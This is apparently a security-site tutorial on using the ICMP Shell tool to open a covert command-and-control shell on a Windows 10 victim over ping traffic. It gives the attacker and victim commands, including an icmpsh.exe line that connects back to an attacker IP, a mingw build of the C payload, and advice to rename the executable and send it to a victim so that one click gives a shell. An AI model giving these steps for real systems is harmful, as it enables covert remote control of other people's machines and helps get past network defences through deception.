Saturday, March 29, 2025
HomeExploitation ToolsICMP Shell- Secret Command and Control Channel to Control Victims Machine Using...

ICMP Shell- Secret Command and Control Channel to Control Victims Machine Using Ping

Published on

SIEM as a Service

Follow Us on Google News

Corporate firewalls can block reverse and bind TCP connections. However, corporate firewalls are behind internal networks. So we can use PING as a great convert channel to get victim shell access using ICMP Shell.

Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)

Attacker Machine:-

  • Download the ICMP SHELL tool Here
  • execute command  ./run.sh shell script with 777 Permissions ( read, write, execute)
  • The output of the shell script command will give a piece of code icmpsh.exe -t 192.168.43.7 -d 500 -b 30 -s 128.

Victim Machine:-

  • Upload “icmpsh.exe” on the victim machine.
  • Run CMD and  Execute “icmpsh.exe -t <Attackers IP> -d 500 -b 30 -s 128” as a listener.
  • Here Listener script will be icmpsh.exe -t 192.168.43.7 -d 500 -b 30 -s 128.
  • Execute this with CMD  & No admin privileges are needed.

Also Read :  Operating Systems can be detected using Ping Command

Back to Attacker Machine:-

  • Once the Listener is executed on my Windows 10 victim machine, Here we got a shell with ICMP.
  • So we can start our command and control of victim’s pc.
  • So only, ICMP requests/response traffic only sent via the attacker’s machine to the victim’s machine.

Victims Click & Shell Access:-

  • If you want to compromise victim directly by clicking, you can download the c code here 
  • After downloading compile the c code directly with the known victim IP Install MinGW in Kali Linux and run the following command to compile the C file i686-w64-mingw32-gcc icmp-slave-complete.c -o icmp-slave-complete.exe
  • Now you can Rename icmp-slave-complete.exe and send it to the victim. SHELL SHELL SHELL !!!

Latest articles

SquareX Discloses Browser-Native Ransomware that Puts Millions at Risk

From WannaCry to the MGM Resorts Hack, ransomware remains one of the most damaging...

Hackers Exploit DNS MX Records to Create Fake Logins Imitating 100+ Brands

Cybersecurity researchers have discovered a sophisticated phishing-as-a-service (PhaaS) platform, dubbed "Morphing Meerkat," that leverages...

New Python-Based Discord RAT Targets Users to Steal Login Credentials

A recently identified Remote Access Trojan (RAT) has raised alarms within the cybersecurity community...

PJobRAT Android Malware Masquerades as Dating and Messaging Apps to Target Military Personnel

PJobRAT, an Android Remote Access Trojan (RAT) first identified in 2019, has resurfaced in...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

Windows 11 BitLocker Bypassed to Extract Encryption Keys

An attacker with physical access can abruptly restart the device and dump RAM, as...

ConvoC2 – A Red Teamers Tool To Execute Commands on Hacked Hosts Via Microsoft Teams

A stealthy Command-and-Control (C2) infrastructure Red Team tool named ConvoC2 showcases how cyber attackers...

Cloudflare Developer Domains Abused For Cyber Attacks

Cloudflare Pages, a popular web deployment platform, is exploited by threat actors to host...